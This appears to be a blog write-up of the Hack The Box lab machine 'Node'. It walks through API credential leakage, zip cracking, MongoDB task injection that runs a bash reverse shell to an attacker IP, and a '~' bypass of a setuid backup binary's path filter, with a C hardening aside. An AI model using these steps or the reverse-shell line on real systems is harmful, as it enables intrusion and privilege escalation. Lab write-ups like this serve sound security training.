K0Hack's personal blog on ethical hacking concepts // HTB // TryHackMe // hacking summaries // tools for various tasks.

OSCP Path ~ Node from Hack The Box (VIP required)

Node ~ Hack The Box to OSCP

We run the first scan with Nmap

# nmap -p- --open -sS --min-rate 4000 -vvv -n -Pn -oG allports 10.10.10.58

We proceed with the next Nmap scan

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
|   256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_  256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open  hadoop-datanode Apache Hadoop
| hadoop-datanode-info: 
|_  Logs: /login
| hadoop-tasktracker-info: 
|_  Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We browse to the web application on port 3000

We press CTRL + U to view the page source

In the source we find this JavaScript include, which references an app controller (profile):

<script type="text/javascript" src="assets/js/app/controllers/profile.js"></script>

We make a curl request

We open /assets/js/app/controllers/profile.js
# curl -s -X GET "http://10.10.10.58:3000/assets/js/app/controllers/profile.js"
var controllers = angular.module('controllers');

controllers.controller('ProfileCtrl', function ($scope, $http, $routeParams) {
  $http.get('/api/users/' + $routeParams.username)
    .then(function (res) {
      $scope.user = res.data;
    }, function (res) {
      $scope.hasError = true;

      if (res.status == 404) {
        $scope.errorMessage = 'This user does not exist';
      }
      else {
        $scope.errorMessage = 'An unexpected error occurred';
      }
    });
});

This reveals a potential route: /api/users/. We request it and find a set of credentials

# curl -s -X GET "http://10.10.10.58:3000/api/users/" | jq
[
  {
    "_id": "59a7365b98aa325cc03ee51c",
    "username": "myP14ceAdm1nAcc0uNT",
    "password": "dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af",
    "is_admin": true
  },
  {
    "_id": "59a7368398aa325cc03ee51d",
    "username": "tom",
    "password": "f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240",
    "is_admin": false
  },
  {
    "_id": "59a7368e98aa325cc03ee51e",
    "username": "mark",
    "password": "de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73",
    "is_admin": false
  },
  {
    "_id": "59aa9781cced6f1d1490fce9",
    "username": "rastating",
    "password": "5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0",
    "is_admin": false
  }
]

Credentials:

The user that is admin
user: myP14ceAdm1nAcc0uNT
pass: manchester

We log in and download a file: myplace.backup

We cat the file and see that it is base64-encoded, so we decode it

# cat myplace.backup| base64 -d >> myplace
# file myplace     
myplace: Zip archive data, at least v1.0 to extract
# 7z x myplace  ------- IT ASKS FOR A PASSWORD

We try to crack it with the fcrackzip tool

# ls
myplace  myplace.backup
# fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt -v myplace 
PASSWORD FOUND!!!!: pw == "magicword"

We get a lot of directories with resources; we go into /var/www/myplace

We grep the files for relevant data

# cat app.js | grep -i -E "user|pass|db"
const MongoClient = require('mongodb').MongoClient;
const ObjectID    = require('mongodb').ObjectID;
const url         = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
MongoClient.connect(url, function(error, db) {
  if (error || !db) {
    console.log('[!] Failed to connect to mongodb');

Credentials obtained:

mark: 5AYRft73VtFpc84k

We log in over SSH with these credentials, thanks to credential reuse.

# ssh mark@10.10.10.58 

mark@node:~$ ls -la
total 24
drwxr-xr-x 3 root root 4096 Sep  3  2017 .
drwxr-xr-x 5 root root 4096 Aug 31  2017 ..
-rw-r--r-- 1 root root  220 Aug 31  2017 .bash_logout
-rw-r--r-- 1 root root 3771 Aug 31  2017 .bashrc
drwx------ 2 root root 4096 Aug 31  2017 .cache
-rw-r----- 1 root root    0 Sep  3  2017 .dbshell
-rwxr-xr-x 1 root root    0 Sep  3  2017 .mongorc.js
-rw-r--r-- 1 root root  655 Aug 31  2017 .profile

Enumerating the system a bit, we look at what is in /var/

We find the /scheduler/ directory, which is usually for system-level cron tasks or something related

mark@node:/var/scheduler$ ls -l
total 20
-rw-rw-r--  1 root root  910 Sep  3  2017 app.js
drwxr-xr-x 19 root root 4096 Sep  3  2017 node_modules
-rw-rw-r--  1 root root  176 Sep  3  2017 package.json
-rw-r--r--  1 root root 4709 Sep  3  2017 package-lock.json

We run a procmon script to detect system-level cron tasks

/usr/bin/mongod --auth --quiet --config /etc/mongod.conf
scheduler --?¿ -- These are cron-style tasks at the MongoDB database level
> /usr/bin/node /var/scheduler/app.js

We try connecting to the MongoDB database, which shows up a lot, with the credentials of

user: mark
pass: 5AYRft73VtFpc84k

Mongo-DB

We inject a task into the tasks collection

mark@node:/var/tmp/Cron-Finder$ mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
> show collections
tasks
> db.task.find()
> db.task.insertOne({cmd: "bash /tmp/shell.sh"});
2021-07-22T00:33:47.675+0100 E QUERY    [thread1] TypeError: db.task.instertOne is not a function :
@(shell):1:1

> db.task.find()  --- we run it until the entry disappears, which is when the task has been executed to get in as the user TOM

We have to insert the task again

 > db.tasks.insertOne({cmd: "bash /tmp/shell.sh"});
 > db.task.find()   --- we run it until the entry disappears, which is when the task has been executed to get in as the user TOM

Beforehand, for this to work, we create /tmp/shell.sh; it is important to run chmod +x shell.sh

 bash -i >& /dev/tcp/10.10.14.12/443 0>&1

And this one does give us the shell directly through the task written to MongoDB; we grab the user.txt flag

# nc -vlnp 444 : 
tom@node:~$ ls
user.txt
tom@node:~$ cat user.txt 
e1156acc3574e04b06908exxxxxxxxx

# Privesc root

Once we have the shell as the user TOM, we look at the app.js file

We find this in part of the app's JS code:

var proc = spawn('/usr/local/bin/backup', ['-q', backup_key, __dirname ]);

We check:

tom@node:/$ ls /usr/local/bin/backup
/usr/local/bin/backup
tom@node:/$ ls -l /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep  3  2017 /usr/local/bin/backup

We run it to see what happens:

tom@node:/usr/local/bin$ backup asdfa asdfa /root/



             ____________________________________________________
            /                                                    \
           |    _____________________________________________     |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |             Secure Backup v1.0              |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |                                             |    |
           |   |_____________________________________________|    |
           |                                                      |
            \_____________________________________________________/
                   \_______________________________________/
                _______________________________________________
             _-'    .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.  --- `-_
          _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--.  .-.-.`-_
       _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
    _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
 _-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'


 [!] Ah-ah-ah! You didn't say the magic word!

We run it again, this time under ltrace, and instead of the /root directory we used first, we use /tmp.

ltrace returns the following relevant lines:
strstr("/tmp", "..")                                                                                                               = nil                                         
strstr("/tmp", "/root")                                                                                                            = nil                                         
strchr("/tmp", ';')                                                                                                                = nil                                         
strchr("/tmp", '&')                                                                                                                = nil                                         
strchr("/tmp", '`')                                                                                                                = nil                                         
strchr("/tmp", '$')                                                                                                                = nil                                         
strchr("/tmp", '|')                                                                                                                = nil                                         
strstr("/tmp", "//")                                                                                                               = nil                                         
strcmp("/tmp", "/")                                                                                                                = 1                                           
strstr("/tmp", "/etc") 
--------------
fopen("/etc/myplace/keys", "r")

It filters on those characters: when running backup + key + /path/, the path must not contain any of them; if it does = TROLL FACE

We cat /etc/myplace/keys

tom@node:/var/www/myplace$ cat /etc/myplace/keys                                                                                                                       
a01a6aa5aaf1d7729f35c8278daae30f8a988257144c003f8b12c5aec39bc508                                                            
45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474
3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110  ----- We use this one

Passing it the key and trying to back up the /root directory...

tom@node:/var/www/myplace$  /usr/local/bin/backup asda 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110  /root

# cat root.txt
QQQQQQQQQQQQQQQD!`__ssaaaaaaaaaass_ass_s____.  -~""??9VWQQQQQQQQQQQQQQQQQQQ
QQQQQQQQQQQQQP'_wmQQQWWBWV?GwwwmmWQmwwwwwgmZUVVHAqwaaaac,"?9$QQQQQQQQQQQQQQ
QQQQQQQQQQQW! aQWQQQQW?qw#TTSgwawwggywawwpY?T?TYTYTXmwwgZ$ma/-?4QQQQQQQQQQQ
QQQQQQQQQQW' jQQQQWTqwDYauT9mmwwawww?WWWWQQQQQ@TT?TVTT9HQQQQQQw,-4QQQQQQQQQ
QQQQQQQQQQ[ jQQQQQyWVw2$wWWQQQWWQWWWW7WQQQQQQQQPWWQQQWQQw7WQQQWWc)WWQQQQQQQ
QQQQQQQQQf jQQQQQWWmWmmQWU???????9WWQmWQQQQQQQWjWQQQQQQQWQmQQQQWL 4QQQQQQQQ
QQQQQQQP'.yQQQQQQQQQQQP"       <wa,.!4WQQQQQQQWdWP??!"??4WWQQQWQQc ?QWQQQQQ
QQQQQP'_a.<aamQQQW!<yF "!` ..  "??$Qa "WQQQWTVP'    "??' =QQmWWV?46/ ?QQQQQ
QQQP'sdyWQP?!`.-"?46mQQQQQQT!mQQgaa. <wWQQWQaa _aawmWWQQQQQQQQQWP4a7g -WWQQ
QQ[ j@mQP'adQQP4ga, -????" <jQQQQQWQQQQQQQQQWW;)WQWWWW9QQP?"`  -?QzQ7L ]QQQ
QW jQkQ@ jWQQD'-?$QQQQQQQQQQQQQQQQQWWQWQQQWQQQc "4QQQQa   .QP4QQQQfWkl jQQQ
QE ]QkQk $D?`  waa "?9WWQQQP??T?47`_aamQQQQQQWWQw,-?QWWQQQQQ`"QQQD\Qf(.QWQQ
QQ,-Qm4Q/-QmQ6 "WWQma/  "??QQQQQQL 4W"- -?$QQQQWP`s,awT$QQQ@  "QW@?$:.yQQQQ
QQm/-4wTQgQWQQ,  ?4WWk 4waac -???$waQQQQQQQQF??'<mWWWWWQW?^  ` ]6QQ' yQQQQQ
QQQQw,-?QmWQQQQw  a,    ?QWWQQQw _.  "????9VWaamQWV???"  a j/  ]QQf jQQQQQQ
QQQQQQw,"4QQQQQQm,-$Qa     ???4F jQQQQQwc <aaas _aaaaa 4QW ]E  )WQ`=QQQQQQQ
QQQQQQWQ/ $QQQQQQQa ?H ]Wwa,     ???9WWWh dQWWW,=QWWU?  ?!     )WQ ]QQQQQQQ
QQQQQQQQQc-QWQQQQQW6,  QWQWQQQk <c                             jWQ ]QQQQQQQ
QQQQQQQQQQ,"$WQQWQQQQg,."?QQQQ'.mQQQmaa,.,                . .; QWQ.]QQQQQQQ
QQQQQQQQQWQa ?$WQQWQQQQQa,."?( mQQQQQQW[:QQQQm[ ammF jy! j( } jQQQ(:QQQQQQQ
QQQQQQQQQQWWma "9gw?9gdB?QQwa, -??T$WQQ;:QQQWQ ]WWD _Qf +?! _jQQQWf QQQQQQQ
QQQQQQQQQQQQQQQws "Tqau?9maZ?WQmaas,,    --~-- ---  . _ssawmQQQQQQk 3QQQQWQ
QQQQQQQQQQQQQQQQWQga,-?9mwad?1wdT9WQQQQQWVVTTYY?YTVWQQQQWWD5mQQPQQQ ]QQQQQQ
QQQQQQQWQQQQQQQQQQQWQQwa,-??$QwadV}<wBHHVHWWBHHUWWBVTTTV5awBQQD6QQQ ]QQQQQQ

We get a troll face back because, as we saw, it filters on the bad string /root/

We see that the ~ symbol (as in cd ~), which points to the home directory, is not covered by the bad characters.

We change the HOME variable to /root/ so that ~, which is precisely the symbol the checks above do not filter, refers to the root directory.
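
The ltrace output and the ~ bypass above show why a deny-list on the raw argument is fragile. As an added example (not code from the original post or from the backup binary), the C sketch below rebuilds that deny-list from the traced calls and sets it beside a check that canonicalises the path with realpath() and accepts only paths under an allowed base; the function names and the /tmp base are assumptions.

```c
#define _XOPEN_SOURCE 700 /* realpath(), PATH_MAX */
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Deny-list rebuilt from the ltrace lines above (a reconstruction for
 * illustration, not the binary's source). Returns 1 if the path passes. */
int denylist_allows(const char *path) {
    static const char *bad_sub[] = {"..", "/root", "//", "/etc"};
    static const char bad_chr[] = ";&`$|";
    for (size_t i = 0; i < sizeof bad_sub / sizeof bad_sub[0]; i++)
        if (strstr(path, bad_sub[i])) return 0;
    for (const char *c = bad_chr; *c; c++)
        if (strchr(path, *c)) return 0;
    return strcmp(path, "/") != 0;
}

/* Hardened check: resolve the path first (symlinks, "..", relative names),
 * then accept it only if it is the allowed base or lies beneath it.
 * Nothing is expanded by a shell, so "~" is just a literal file name. */
int allowlist_allows(const char *path, const char *base) {
    char real[PATH_MAX], rbase[PATH_MAX];
    if (!realpath(path, real) || !realpath(base, rbase)) return 0;
    size_t n = strlen(rbase);
    if (strncmp(real, rbase, n) != 0) return 0;
    return real[n] == '\0' || real[n] == '/';
}

int main(void) {
    /* Constructed inputs; "/tmp" as the allowed base is an assumed policy. */
    const char *inputs[] = {"/tmp", "/root", "~", "/tmp/../etc"};
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++)
        printf("%-12s deny-list=%d allow-list=%d\n", inputs[i],
               denylist_allows(inputs[i]), allowlist_allows(inputs[i], "/tmp"));
    return 0;
}
```

The deny-list accepts "~" because none of its substrings or characters match, while the canonicalising check rejects it along with anything that resolves outside the allowed base.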

Running the backup binary successfully after changing the HOME variable:

tom@node:/$ /usr/local/bin/backup asda 3de811f4ab2b7543eaf45df611c2dd2541a5fc5af601772638b81dce6852d110 "~"

It returns a base64 string:

echo "<BASE64_OUTPUT>" | base64 -d > root.zip

Using 7z x to extract the root.zip archive

# 7z x root.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=es_ES.UTF-8,Utf16=on,HugeFiles=on,64 bits,8 CPUs Intel(R) Core(TM) i7-8700K CPU @ 3.70GHz (906EA),ASM,AES-NI)
Scanning the drive for archives:
1 file, 1141 bytes (2 KiB)
Extracting archive: root.zip
--
Path = root.zip
Type = zip
Physical Size = 1141
Enter password (will not be echoed): "magicword"
Everything is Ok
Size:       2584
Compressed: 1141
                                                                                                      
(root💀kali)-[/home/…/HTB/OSCP/Node/tmp]
└─# ls
root.txt  root.zip

We read the flag from root.txt

# cat root.txt 
1722e99ca5f353b3625xxxxxxxxxxxxxx

Machine rooted =)